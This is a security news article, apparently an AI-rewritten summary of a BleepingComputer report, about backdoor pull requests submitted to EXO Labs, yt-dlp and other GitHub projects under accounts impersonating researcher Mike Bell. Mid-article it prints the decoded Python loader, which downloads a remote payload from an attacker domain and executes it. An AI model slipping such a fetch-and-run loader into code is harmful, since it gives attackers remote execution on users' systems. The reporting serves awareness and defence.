Ethical Hacking News
Malicious GitHub commits have been used to frame researcher Mike Bell, while also infecting other open-source projects like Exo Labs and yt-dlp. Researchers must remain vigilant in their cybersecurity efforts to protect against such threats.
Malicious commits and pull requests targeting GitHub open-source projects have been detected, attempting to inject backdoors.A malicious PR was submitted to EXO Labs' GitHub repository, which attempted to connect to a URL on evildojo.com and download a payload.The commit was made from a deleted GitHub account impersonating Mike Bell, a Texas-based security researcher and software engineer.Multiple projects were targeted by similar malicious commits, including yt-dlp, a popular open-source audio and video downloader.A Google engineer used Presubmit's AI Reviewer to test the PR and flagged it with a "critical security" alert.The incident highlights the importance of vigilance in maintaining cybersecurity standards for open-source projects.
GitHub, a popular platform for open-source projects, has been targeted by malicious commits and pull requests, attempting to inject backdoors into these projects. The most recent incident involved the Exo Labs AI and machine learning startup, which was targeted with a malicious code change submitted under an innocent-looking PR.
On Tuesday, Alex Cheema, co-founder of EXO Labs warned everyone about the suspicious code change submitted to EXO's GitHub repository. The pull request titled "clarify mlx requirement for deepseek models" attempted to modify the models.py Python file in the Exo's code base by adding a sequence of numbers to it. These numbers, when decoded, represented a piece of code that connected to a URL on a domain called evildojo.com.
This sequence of characters translates into the following code snippet:
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
The rather unsophisticated piece of code attempted to connect to evildojo.com and download a "stage1" payload. However, when accessed by BleepingComputer, the link returned a 404 (Not Found), and several others who tried to access the URL found no content ever existed at that location from the beginning.
The commit appears to have been submitted from a GitHub user named "evildojo666," an account that has since been deleted. However, the archived page for the GitHub username points to Mike Bell, a Texas-based security researcher and software engineer who claims someone is impersonating him and making these malicious code submissions to smear him.
Statement from Mike Bell
Bell states, "there was never any payload... why do people keep assuming there was?" In all fairness, Bell's story adds up. Anyone can trivially create a GitHub account using another person's details and profile picture, and begin submitting code changes and pull requests to projects – all under the guise of another person.
Another now-deleted GitHub account "darkimage666" was identified by Malcoreio, a malware analysis and reverse engineering platform. This account also impersonated Bell and appeared to engage in this malicious effort to distribute backdoor commits to open-source projects.
"Not me, an impersonator," remarked Bell at the imposter account.
Multiple projects targeted
Social media users, including ChrzanKong, noted that some other projects had been targeted by different GitHub user accounts with similar commits. According to threat intel analyst vx-underground, "yt-dlp," a popular open-source audio and video downloader was also targeted. Malcore identified at least 18 instances of identical pull requests directed at other projects.
At the time of writing, BleepingComputer observed that many such malicious commits and the associated "muppet" GitHub user accounts have been taken down.
Google engineer and tech events lead, Bogdan Stanga was able to recreate the pull request to test Presubmit's AI Reviewer, which uses GitHub Actions to perform instant code reviews against incoming pull requests to your repository. The test code change was immediately flagged with a "critical security" alert by the reviewer.
Presubmit's AI reviewer catches similar malicious PRs
(BleepingComputer)
The incident echoes the notable xz supply chain attack that recently demonstrated how malicious code could be snuck into legitimate and widely popular open-source libraries by nefarious actors. Open-source project maintainers are urged to carefully scrutinize incoming pull requests, via automated tools and extensive human code reviews, even if these appear to be originating from "good faith" contributors.
In conclusion, this smear campaign against researchers and open-source projects highlights the importance of vigilance in maintaining cybersecurity standards. It emphasizes that any seemingly innocuous changes or updates should be reviewed with extreme caution before they are integrated into the project's codebase.
Related Information:
https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
Published: Sat Nov 16 10:33:43 2024 by llama3.2 3B Q4_K_M
